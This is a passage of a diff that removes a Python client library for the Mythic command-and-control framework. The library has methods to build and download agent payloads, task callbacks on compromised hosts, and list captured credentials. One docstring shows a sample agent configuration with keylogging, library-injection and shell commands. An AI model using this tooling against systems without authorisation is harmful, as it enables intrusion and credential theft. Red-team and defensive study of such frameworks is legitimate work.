@status.setter - def status(self, status): - self.__status = status - - @raw_response.setter - def raw_response(self, raw_response): - self.__raw_response = raw_response - - -class Mythic: - def __init__( - self, - username: str = None, - password: str = None, - apitoken: Union[APIToken, str] = None, - access_token: str = None, - refresh_token: str = None, - server_ip: str = None, - ssl: bool = False, - server_port: str = None, - server_api_version: int = 1.4, - operator: Operator = None, - global_timeout: int = None, - ): - self._username = username - self._password = password - if isinstance(apitoken, APIToken) or apitoken is None: - self._apitoken = apitoken - else: - self._apitoken = APIToken(token_value=apitoken) - self._access_token = access_token - self._refresh_token = refresh_token - self._server_ip = server_ip - self._server_port = server_port - self._server_api_version = server_api_version - self._operator = operator - self._ssl = ssl - self._http = "http://" if not ssl else "https://" - self._ws = "ws://" if not ssl else "wss://" - self._global_timeout = global_timeout if global_timeout is not None else -1 - - def to_json(self): - r = {} - for k in vars(self): - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps(getattr(self, k)) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - # ======== GETTING INTERNAL VALUES ================== - @property - def username(self): - return self._username - - @property - def password(self): - return self._password - - @property - def apitoken(self): - return self._apitoken - - @property - def 
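MythicResponse centralizes how every HTTP helper below reports results: the status is lifted out of the raw JSON when present, a non-200 code is downgraded to "error", and the remaining JSON (minus the status key) is exposed as .response. A sketch, module name assumed as before:

# Illustrative sketch of the status/response derivation.
from mythic_rest import MythicResponse

ok = MythicResponse(response_code=200, raw_response={"status": "success", "name": "op1"})
print(ok.status)     # "success" - taken from the raw JSON
print(ok.response)   # {"name": "op1"} - the status key is stripped out

err = MythicResponse(response_code=500, raw_response={"error": "boom"})
print(err.status)    # "error" - inferred from the non-200 response code
print(err.response)  # {"error": "boom"}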
access_token(self): - return self._access_token - - @property - def refresh_token(self): - return self._refresh_token - - @property - def server_ip(self): - return self._server_ip - - @property - def server_port(self): - return self._server_port - - @property - def operator(self): - return self._operator - - @property - def server_api_version(self): - return self._server_api_version - - @property - def ssl(self): - return self._ssl - - @property - def global_timeout(self): - return self._global_timeout - - # ========== SETTING INTERNAL VALUES =============== - @username.setter - def username(self, username=None): - self._username = username - - @password.setter - def password(self, password=None): - self._password = password - - @apitoken.setter - def apitoken(self, apitoken=None): - if isinstance(apitoken, APIToken) or apitoken is None: - self._apitoken = apitoken - else: - self._apitoken = APIToken(token_value=apitoken) - - @access_token.setter - def access_token(self, access_token=None): - self._access_token = access_token - - @refresh_token.setter - def refresh_token(self, refresh_token=None): - self._refresh_token = refresh_token - - @server_ip.setter - def server_ip(self, server_ip=None): - self._server_ip = server_ip - - @server_port.setter - def server_port(self, server_port=None): - self._server_port = server_port - - @operator.setter - def operator(self, operator=None): - self._operator = operator - - @server_api_version.setter - def server_api_version(self, server_api_version=None): - self._server_api_version = server_api_version - - @ssl.setter - def ssl(self, ssl=False): - self._ssl = ssl - self._http = "http://" if not ssl else "https://" - self._ws = "ws://" if not ssl else "wss://" - - # ======== BASIC GET/POST/PUT/DELETE JSON WEB REQUESTS ========= - - def get_headers(self) -> dict: - if self._apitoken is not None: - return {"apitoken": self._apitoken.token_value} - elif self._access_token is not None: - return {"Authorization": "Bearer {}".format(self._access_token)} - else: - return {} - - async def get_json(self, url) -> MythicResponse: - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - async with session.get(url, headers=headers, ssl=False) as resp: - return MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - #print(o) - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - #print(e) - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - - async def get_file(self, url) -> bytes: - headers = self.get_headers() - async with aiohttp.ClientSession() as session: - async with session.get(url, headers=headers, ssl=False) as resp: - data = await resp.read() - return data - - - async def put_json(self, url, data) -> MythicResponse: - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - async with session.put( - url, json=data, headers=headers, ssl=False - ) as resp: - return MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - - async def post_json(self, url, data) -> MythicResponse: - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - 
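The Mythic client stores connection details, derives the http/ws URL prefixes from the ssl flag, and get_headers() prefers an API token over a JWT bearer token. A sketch with placeholder connection details, module name assumed as before:

# Illustrative sketch; server address, port, and token value are placeholders.
from mythic_rest import Mythic

mythic = Mythic(
    apitoken="TOKEN_PLACEHOLDER",  # a plain string is wrapped in an APIToken object
    server_ip="192.168.53.128",
    server_port="7443",
    ssl=True,                      # selects the https:// and wss:// prefixes
    global_timeout=-1,             # negative timeout means websocket streams never give up
)
print(mythic.get_headers())        # {"apitoken": "TOKEN_PLACEHOLDER"}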
async with session.post( - url, json=data, headers=headers, ssl=False - ) as resp: - return MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - - async def delete_json(self, url) -> MythicResponse: - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - async with session.delete(url, headers=headers, ssl=False) as resp: - return MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - - # ======== WEBSOCKET BASED HELPER ENDPOINTS ======================== - - async def print_websocket_output(self, mythic, data) -> None: - try: - await json_print(data) - except Exception as e: - raise Exception("Failed to decode json data: " + str(e)) - - async def cast_data(self, data): - try: - json_data = json.loads(data) - if "channel" in json_data: - if "callback" in json_data["channel"]: - del json_data["channel"] - return Callback(**json_data) - elif "task" in json_data["channel"]: - del json_data["channel"] - return Task(**json_data) - elif "response" in json_data["channel"]: - del json_data["channel"] - return Response(**json_data) - elif "historic" in json_data["channel"]: - return EventMessage(**json_data) - elif "event" in json_data["channel"]: - return EventMessage(**json_data) - elif "chunks_received" in json_data: - return FileMeta(**json_data) - elif "build_phase" in json_data: - return Payload(**json_data) - elif "agent_task_id" in json_data: - return Task(**json_data) - elif "response" in json_data: - return Response(**json_data) - elif "realm" in json_data: - return Credential(**json_data) - elif "level" in json_data: - return EventMessage(**json_data) - elif "agent_callback_id" in json_data: - return Callback(**json_data) - else: - raise Exception("Unknown Mythic Object: " + json.dumps(json_data, indent=2)) - except Exception as e: - raise Exception("Failed to decode json data: " + str(e)) - - async def thread_output_helper( - self, url, callback_function=None, timeout=None - ) -> None: - headers = self.get_headers() - if timeout is None: - timeout = self.global_timeout - try: - async with aiohttp.ClientSession() as session: - ws = await session.ws_connect(url, headers=headers, ssl=False) - start = time() - while True: - try: - if timeout > 0 and (time() - start >= timeout): - raise Exception( - "Timeout in listening on websocket endpoint: {}".format( - url - ) - ) - msg = await ws.receive() - if msg.data is None: - raise Exception( - "Got no data from websocket: {}".format(str(msg)) - ) - if msg.data != "": - task = asyncio.get_event_loop().create_task( - callback_function(self, await self.cast_data(msg.data)) - ) - asyncio.ensure_future(task) - except Exception as e: - raise Exception("Got exception reading from websocket, exiting websocket: " + str(e)) - except Exception as e: - raise Exception("Failed to get websocket connection: " + str(e)) - - async def stream_output(self, url, callback_function, timeout) -> asyncio.Task: - task = asyncio.get_event_loop().create_task( - self.thread_output_helper(url, 
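The websocket helpers above connect to a ws/wss endpoint, run each JSON frame through cast_data() to get back a typed object (Task, Response, Callback, EventMessage, and so on), and schedule a user-supplied coroutine for every object received. A sketch of wiring up a callback; the endpoint path is a placeholder because the convenience wrappers that know the real websocket routes are defined elsewhere in this module:

# Illustrative sketch; the websocket path and connection details are placeholders.
import asyncio
from mythic_rest import Mythic

async def handler(mythic_instance, obj):
    # obj has already been cast by cast_data() into the matching model class.
    print(type(obj).__name__)

async def main():
    mythic = Mythic(apitoken="TOKEN_PLACEHOLDER", server_ip="192.168.53.128",
                    server_port="7443", ssl=True, global_timeout=-1)
    url = "{}{}:{}/ws/ENDPOINT_PLACEHOLDER".format(mythic._ws, mythic.server_ip, mythic.server_port)
    await mythic.stream_output(url, handler, None)   # None falls back to global_timeout
    await asyncio.sleep(300)                         # keep the loop alive while the stream task runs

asyncio.run(main())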
callback_function, timeout) - ) - asyncio.ensure_future(task) - return task - - # ================== OPERATION ENDPOINTS ====================== - - async def get_current_operation_info(self) -> MythicResponse: - """ - Gets information about the current operation for the user - """ - if self.operator is None: - await self.get_self() - url = "{}{}:{}/api/v{}/operations/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - self.operator.current_operation.id, - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operation(**resp.response) - return resp - - async def get_all_operations(self) -> MythicResponse: - """ - Gets information about all operations your operator can see - """ - url = "{}{}:{}/api/v{}/operations".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - operations = [] - for o in resp.response["output"]: - operations.append(Operation(**o)) - resp.response = operations - return resp - - async def get_operation(self, operation: Operation) -> MythicResponse: - """ - Gets information about the current user - """ - if operation.id is None: - resp = await self.get_all_operations() - if resp.response_code == 200 and resp.status == "success": - for o in resp.response: - if o.name == operation.name: - resp.response = o - return resp - raise Exception("Failed to find operation: " + json.dumps(resp, indent=2, default=lambda o: o.to_json())) - else: - url = "{}{}:{}/api/v{}/operations/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operation.id), - ) - resp = await self.get_json(url) - if resp.response_code == 200: - resp.response = Operation(**resp.response) - return resp - - async def add_or_update_operator_for_operation( - self, operation: Operation, operator: Operator - ) -> MythicResponse: - """ - Adds an operator to an operation or updates an operator's view/block lists in an operation - """ - resp = await self.get_operation(operation) - if resp.status == "success": - operation = resp.response - else: - raise Exception( - "failed to get operation in add_or_update_operator_for_operation" - ) - data = {"add_members": [await obj_to_json(operator)]} - if operator.base_disabled_commands is not None: - data["add_disabled_commands"] = [await obj_to_json(operator)] - url = "{}{}:{}/api/v{}/operations/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operation.id), - ) - resp = await self.put_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operation(**resp.response) - return resp - - async def remove_operator_from_operation( - self, operation: Operation, operator: Operator - ) -> MythicResponse: - """ - Removes an operator from an operation - """ - resp = await self.get_operation(operation) - if resp.status == "success": - operation = resp.response - else: - raise Exception("failed to get operation in remove_operator_for_operation") - data = {"remove_members": [operator.username]} - url = "{}{}:{}/api/v{}/operations/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operation.id), - ) - resp = await self.put_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operation(**resp.response) - return resp - - async def 
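The operation endpoints return MythicResponse objects whose .response has already been upgraded to Operation instances, and get_operation() falls back to a name lookup through get_all_operations() when no id is set. A sketch, placeholders as before:

# Illustrative sketch; connection details and the operation name are placeholders.
import asyncio
from mythic_rest import Mythic, Operation

async def main():
    mythic = Mythic(apitoken="TOKEN_PLACEHOLDER", server_ip="192.168.53.128",
                    server_port="7443", ssl=True)
    resp = await mythic.get_all_operations()
    for op in resp.response:          # Operation objects, not raw dicts
        print(op.id, op.name)
    one = await mythic.get_operation(Operation(name="OPERATION_NAME_PLACEHOLDER"))
    print(one.response.id)            # resolved by name since no id was supplied

asyncio.run(main())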
update_operation(self, operation: Operation) -> MythicResponse: - """ - Updates information about an operation such as webhook and completion status - """ - if operation.id is None: - resp = await self.get_operation(operation) - if resp.status == "error": - raise Exception("Failed to get_operation in update_operation") - operation.id = resp.response.id - url = "{}{}:{}/api/v{}/operations/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operation.id), - ) - resp = await self.put_json(url, data=await obj_to_json(operation)) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operation(**resp.response) - return resp - - async def create_operation(self, operation: Operation) -> MythicResponse: - """ - Creates a new operation and specifies the admin of the operation - """ - url = "{}{}:{}/api/v{}/operations/".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - ) - data = { - "name": operation.name, - "admin": operation.admin.username - } - resp = await self.post_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operation(**resp.response) - return resp - - # ================== OPERATOR ENDPOINTS ====================== - - async def get_self(self) -> MythicResponse: - """ - Gets information about the current user - """ - url = "{}{}:{}/api/v{}/operators/me".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - self.operator = Operator(**resp.response) - resp.response = Operator(**resp.response) - return resp - - async def get_operator(self, operator: Operator) -> MythicResponse: - """ - Gets information about the current user - """ - if operator.id is None: - # need to get the operator's ID first, which means we need to get all operators and match the username - url = "{}{}:{}/api/v{}/operators/".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - if resp.status is None: - resp.status = "success" - for o in resp.response: - if o["username"] == operator.username: - resp.response = Operator(**o) - return resp - raise Exception("Operator not found: " + json.dumps(resp, indent=2, default=lambda o: o.to_json())) - return resp - else: - url = "{}{}:{}/api/v{}/operators/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operator.id), - ) - resp = await self.get_json(url) - if resp.response_code == 200: - resp.response = Operator(**resp.response) - return resp - - async def create_operator(self, operator: Operator) -> MythicResponse: - """ - Creates a new operator with the specified username and password. - If the operator name already exists, just returns information about that operator. 
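The operator endpoints behave the same way: get_self() also caches the result on mythic.operator for later calls, and create_operator() falls back to returning the existing operator when the username is already taken. A sketch; the Operator password keyword is assumed from how create_operator() reads operator.password:

# Illustrative sketch; credentials and connection details are placeholders.
import asyncio
from mythic_rest import Mythic, Operator

async def main():
    mythic = Mythic(apitoken="TOKEN_PLACEHOLDER", server_ip="192.168.53.128",
                    server_port="7443", ssl=True)
    me = await mythic.get_self()
    print(me.response.username)       # also cached on mythic.operator
    new_op = await mythic.create_operator(Operator(username="analyst1", password="CHANGE_ME"))
    print(new_op.response.id)         # existing operator is returned if the name exists

asyncio.run(main())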
- """ - url = "{}{}:{}/api/v{}/operators".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json( - url, data={"username": operator.username, "password": operator.password} - ) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operator(**resp.response) - elif resp.status == "error": - resp = await self.get_operator(operator) - if resp.status == "success": - return resp - raise Exception("Unable to create operator and no active operator found: " + json.dumps(resp, indent=2, default=lambda o: o.to_json())) - return resp - - async def update_operator(self, operator: Operator) -> MythicResponse: - """ - Updates information about the specified operator. - """ - if operator.id is None: - resp = await self.get_operator(operator) - if resp.status == "error": - raise Exception("Failed to get_operator in update_operator") - operator.id = resp.response.id - url = "{}{}:{}/api/v{}/operators/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operator.id), - ) - resp = await self.put_json(url, data=await obj_to_json(operator)) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operator(**resp.response) - return resp - - # ================== APITOKEN ENDPOINTS ====================== - - async def get_apitokens(self) -> MythicResponse: - """ - Gets all of the user's API tokens in a List - :return: - """ - url = "{}{}:{}/api/v{}/apitokens".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - # update the response with APIToken objects instead of just a dictionary - resp.response = [APIToken(**x) for x in resp.response["apitokens"]] - return resp - - async def create_apitoken(self, token_type="User") -> MythicResponse: - """ - Creates an API token for the user - :param token_type: - must be either "User" or "C2" - :return: - """ - # token_type should be C2 or User - url = "{}{}:{}/api/v{}/apitokens".format( - self._http, self._server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json(url, data={"token_type": token_type}) - if resp.response_code == 200 and resp.status == "success": - # update the response to be an object - resp.response = APIToken(**resp.response) - return resp - - async def remove_apitoken(self, apitoken: Union[APIToken, Dict]) -> MythicResponse: - """ - Removes the specified API token and invalidates it going forward - :param apitoken: - if using the APIToken class, the following must be set: - id - :return: - """ - # take in an object and parse it if the value isn't explicitly given - url = "{}{}:{}/api/v{}/apitokens/{}".format( - self._http, - self._server_ip, - self._server_port, - self._server_api_version, - str(apitoken.id if isinstance(apitoken, APIToken) else apitoken["id"]), - ) - resp = await self.delete_json(url) - if resp.response_code == 200 and resp.status == "success": - # update the response to ben an object - resp.response = APIToken(**resp.response) - return resp - - # ================= PAYLOAD ENDPOINTS ======================= - - async def get_payloads(self) -> MythicResponse: - """ - Get all the payloads for the current operation - :return: - """ - url = "{}{}:{}/api/v{}/payloads/current_operation".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - 
# update the response with APIToken objects instead of just a dictionary - resp.response = [Payload(**x) for x in resp.response] - return resp - - async def remove_payload(self, payload: Union[Payload, Dict]) -> MythicResponse: - """ - Mark a payload as deleted in the database and remove it from disk - Truly removing it from the database would delete any corresponding tasks/callbacks, so we don't do that - :param payload: - :return: - """ - url = "{}{}:{}/api/v{}/payloads/{}".format( - self._http, - self._server_ip, - self._server_port, - self._server_api_version, - str(payload.uuid if isinstance(payload, Payload) else payload["uuid"]), - ) - resp = await self.delete_json(url) - if resp.response_code == 200 and resp.status == "success": - # update the response to ben an object - resp.response = Payload(**resp.response) - return resp - - async def create_payload( - self, - payload: Payload, - all_commands: bool = None, - timeout=None, - wait_for_build: bool = None, - ) -> MythicResponse: - """ - :param payload: - - :return: - {"payload_type":"poseidon", - "c2_profiles":[ - {"c2_profile_parameters": - { - "AESPSK":"ElhUTijQn2klOtjlGyxs2uU6oq4PWD2Tboc5qaKzKCg=", - "USER_AGENT":"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", - "callback_host":"https://domain.com", - "callback_interval":"10", - "callback_jitter":"23", - "callback_port":"80", - "domain_front":"", - "encrypted_exchange_check":"T", - "killdate":"yyyy-mm-dd" - }, - "c2_profile":"HTTP" - }], - "filename":"poseidon.bin", - "tag":"this is my tag yo for initial access", - "commands":["cat","cd","cp","curl","download","drives","exit","getenv","getuser","jobkill","jobs","jxa","keylog","keys","kill","libinject","listtasks","ls","mkdir","mv","portscan","ps","pwd","rm","screencapture","setenv","shell","sleep","socks","sshauth","triagedirectory","unsetenv","upload","xpc"], - "build_parameters":[ - {"name":"mode","value":"default"}, - {"name":"os","value":"darwin"} - ] - }" - """ - data = {} - data["payload_type"] = payload.payload_type.ptype - data["filename"] = payload.filename - data["tag"] = payload.tag - if payload.wrapped_payload is None: - data["c2_profiles"] = [] - for k, v in payload.c2_profiles.items(): - parameters = {i.name: i.value for i in v} - data["c2_profiles"].append( - {"c2_profile": k, "c2_profile_parameters": parameters} - ) - data["build_parameters"] = [] - if all_commands: - if payload.payload_type.id is None: - resp = await self.get_payloadtypes() - for p in resp.response: - if p.ptype == payload.payload_type.ptype: - payload.payload_type = p - resp = await self.get_payloadtype_commands(payload.payload_type) - payload.commands = resp.response - if payload.commands is not None: - data["commands"] = [c.cmd for c in payload.commands] - else: - data["commands"] = [] - if payload.build_parameters is not None: - data['build_parameters'] = payload.build_parameters - if payload.wrapped_payload is not None: - data['wrapped_payload'] = payload.wrapped_payload.uuid - url = "{}{}:{}/api/v{}/payloads/create".format( - self._http, self._server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - # update the response to be an object - # this will be a very basic payload with just the payload UUID - resp.response = Payload(**resp.response) - if wait_for_build is not None and wait_for_build: - status = await self.wait_for_payload_status_change( - resp.response.uuid, "success", timeout - ) - if status is None: - 
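create_payload() flattens a Payload object into the JSON shape shown in the docstring above, optionally pulls the full command list for the payload type, and can block until the build finishes. A sketch mirroring that docstring; the C2 parameter names and the C2ProfileParameters keyword arguments are assumptions:

# Illustrative sketch; connection details and parameter names are placeholders.
import asyncio
from mythic_rest import Mythic, Payload

async def main():
    mythic = Mythic(apitoken="TOKEN_PLACEHOLDER", server_ip="192.168.53.128",
                    server_port="7443", ssl=True)
    payload = Payload(
        payload_type="poseidon",
        tag="initial access build",
        filename="poseidon.bin",
        c2_profiles={"HTTP": [
            {"name": "callback_host", "value": "https://domain.com"},
            {"name": "callback_interval", "value": "10"},
            {"name": "callback_port", "value": "80"},
        ]},
        build_parameters=[{"name": "mode", "value": "default"},
                          {"name": "os", "value": "darwin"}],
    )
    # all_commands=True looks up the payload type and includes every registered command;
    # wait_for_build=True polls wait_for_payload_status_change() until the build resolves.
    resp = await mythic.create_payload(payload, all_commands=True, wait_for_build=True, timeout=300)
    print(resp.response.uuid, resp.response.build_phase)

asyncio.run(main())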
raise Exception( - "Failed to get final payload status from wait_for_payload_status_change in creat_payload" - ) - else: - resp.response = status - return resp - - async def get_one_payload_info( - self, payload: Union[Payload, Dict] - ) -> MythicResponse: - """ - Get information about a specific payload - :param payload: - if using the Payload class, the following must be set: - uuid - :return: - """ - url = "{}{}:{}/api/v{}/payloads/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(payload.uuid if isinstance(payload, Payload) else payload["uuid"]), - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - # update the response to ben an object - resp.response = Payload(**resp.response) - return resp - - async def download_payload(self, payload: Union[Payload, Dict]) -> bytes: - """ - Get the final payload for a specified payload - :param payload: - if using Payload class, the following must be set: - uuid - :return: - """ - url = "{}{}:{}/api/v{}/payloads/download/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(payload.uuid if isinstance(payload, Payload) else payload["uuid"]), - ) - resp = await self.get_file(url) - return resp - - # ================= FILE ENDPOINTS ======================= - - async def download_file(self, file: FileMeta) -> bytes: - """ - Download a file that is either scheduled for upload or is finished downloading - """ - url = "{}{}:{}/api/v{}/files/download/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - file.agent_file_id, - ) - resp = await self.get_file(url) - return resp - - # ================ PAYLOAD TYPE ENDPOINTS ==================== - - async def get_payloadtypes(self) -> MythicResponse: - """ - Get all payload types registered with Apfell - :return: - """ - url = "{}{}:{}/api/v{}/payloadtypes/".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - tmp = [] - for x in resp.response["payloads"]: - tmp.append(PayloadType(**x)) - for x in resp.response["wrappers"]: - tmp.append(PayloadType(**x)) - resp.response = tmp - return resp - - async def get_payloadtype( - self, payload_type: Union[PayloadType, Dict] - ) -> MythicResponse: - """ - Get information about a specific payload type - :param payload_type: - if using PayloadType class, the following must be set: - ptype - :return: - """ - url = "{}{}:{}/api/v{}/payloadtypes/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str( - payload_type.id - if isinstance(payload_type, PayloadType) - else payload_type["id"] - ), - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - # update the response with APIToken objects instead of just a dictionary - resp.response = PayloadType(**resp.response) - return resp - - async def get_payloadtype_commands( - self, payload_type: Union[PayloadType, Dict] - ) -> MythicResponse: - """ - Get the commands registered for a specific payload type - :param payload_type: - if using PayloadType class, the following must be set: - ptype - :return: - """ - url = "{}{}:{}/api/v{}/payloadtypes/{}/commands".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str( - payload_type.id - if 
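download_payload() and download_file() return raw bytes rather than a MythicResponse, so the result can be written straight to disk. A sketch; UUIDs are placeholders:

# Illustrative sketch; UUIDs and connection details are placeholders.
import asyncio
from mythic_rest import Mythic, Payload, FileMeta

async def main():
    mythic = Mythic(apitoken="TOKEN_PLACEHOLDER", server_ip="192.168.53.128",
                    server_port="7443", ssl=True)
    blob = await mythic.download_payload(Payload(uuid="PAYLOAD-UUID-PLACEHOLDER"))
    with open("poseidon.bin", "wb") as fh:
        fh.write(blob)
    # Agent uploads/downloads are fetched by their agent_file_id instead of a payload UUID.
    data = await mythic.download_file(FileMeta(agent_file_id="FILE-UUID-PLACEHOLDER"))
    print(len(data))

asyncio.run(main())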
isinstance(payload_type, PayloadType) - else payload_type["id"] - ), - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - resp.response = [Command(**x) for x in resp.response["commands"]] - return resp - - # ================ TASKING ENDPOINTS ======================== - - async def get_all_tasks(self) -> MythicResponse: - """ - Get all of the tasks associated with the user's current operation - :return: - """ - url = "{}{}:{}/api/v{}/tasks/".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = [Task(**x) for x in resp.response] - return resp - - async def get_all_tasks_for_callback( - self, callback: Union[Callback, Dict] - ) -> MythicResponse: - """ - Get the tasks (no responses) for a specific callback - :param callback: - if using the Callback class, the following must be set: - id - :return: - """ - url = "{}{}:{}/api/v{}/tasks/callback/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - callback.id if isinstance(callback, Callback) else callback["id"], - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = [Task(**x) for x in resp.response] - return resp - - async def get_all_responses_for_task( - self, task: Union[Task, Dict] - ) -> MythicResponse: - """ - For the specified task, get all the responses - :param task: - if using the Task class, the following must be set: - id - :return: - """ - url = "{}{}:{}/api/v{}/tasks/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - task.id if isinstance(task, Task) else task["id"], - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - tsk = Task(**resp.response["task"]) - tsk.callback = Callback(**resp.response["callback"]) - tsk.responses = [Response(**x) for x in resp.response["responses"]] - resp.response = tsk - return resp - - async def get_all_tasks_and_responses_grouped_by_callback(self) -> MythicResponse: - """ - Get all tasks and responses for all callbacks in the current operation - :return: - """ - url = "{}{}:{}/api/v{}/task_report_by_callback".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = [Callback(**x) for x in resp.response["output"]] - return resp - - async def create_task( - self, task: Task, return_on="preprocessing", timeout=None - ) -> MythicResponse: - """ - Create a new task for a callback - :param task: - if using the Task class, the following must be set: - callback: id - command: cmd - params - :return: - """ - url = "{}{}:{}/api/v{}/tasks/callback/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - task.callback.id if isinstance(task, Task) else task["callback"], - ) - headers = self.get_headers() - if task.files is None: - data = {"command": task.command.cmd} - if isinstance(task.params, str): - data["params"] = task.params - else: - data["params"] = json.dumps(task.params) - try: - async with aiohttp.ClientSession() as session: - async with session.post( - url, 
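# A usage sketch for the tasking endpoints above. Assumptions: `mythic` is an authenticated
# instance of this client, and the Task/Callback/Command classes accept these fields as
# keyword arguments and default unset fields such as files to None (their definitions are
# not part of this diff).
async def example_issue_task(mythic, callback_id):
    task = Task(callback=Callback(id=callback_id), command=Command(cmd="shell"), params="whoami")
    # return_on="completed" makes create_task block (over websockets) until the task finishes.
    resp = await mythic.create_task(task, return_on="completed", timeout=60)
    full = await mythic.get_all_responses_for_task(resp.response)
    for r in full.response.responses:
        print(r)  # each entry is a Response object; its fields are defined elsewhere in this client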
json=data, headers=headers, ssl=False - ) as resp: - resp = MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - else: - form = aiohttp.FormData() - data = {"command": task.command.cmd, "params": task.params} - for f in task.files: - data["params"][f.param_name] = "FILEUPLOAD" - form.add_field("file" + f.param_name, f.content, filename=f.filename) - data["params"] = json.dumps(data["params"]) - form.add_field("json", json.dumps(data)) - try: - async with aiohttp.ClientSession() as session: - async with session.post( - url, data=form, headers=headers, ssl=False - ) as resp: - resp = MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - if resp.response_code == 200 and resp.status == "success": - resp.response = Task(**resp.response) - if return_on == "preprocessing": - return resp.response - else: - # we need to loop and wait for the status of the task to change - resp.response = await self.wait_for_task_status_change( - resp.response.id, return_on, timeout - ) - return resp - - async def set_comment_on_task(self, task:Task) -> MythicResponse: - """ - Get all of the credentials associated with the user's current operation - :return: - """ - url = "{}{}:{}/api/v{}/tasks/comments/{}".format( - self._http, self.server_ip, self._server_port, self._server_api_version, - task.id - ) - if task.comment == "" or task.comment is None: - resp = await self.delete_json(url) - else: - resp = await self.post_json(url, data={"comment": task.comment}) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = Task(**resp.response['task']) - return resp - - # ============== CREDENTIAL ENDPOINTS ======================== - - async def get_all_credentials(self) -> MythicResponse: - """ - Get all of the credentials associated with the user's current operation - :return: - """ - url = "{}{}:{}/api/v{}/credentials/current_operation".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = [Credential(**x) for x in resp.response["credentials"]] - return resp - - async def create_credential(self, credential: Credential) -> MythicResponse: - """ - Create a new credential associated with the user's current operation - :return: - """ - url = "{}{}:{}/api/v{}/credentials".format( - self._http, 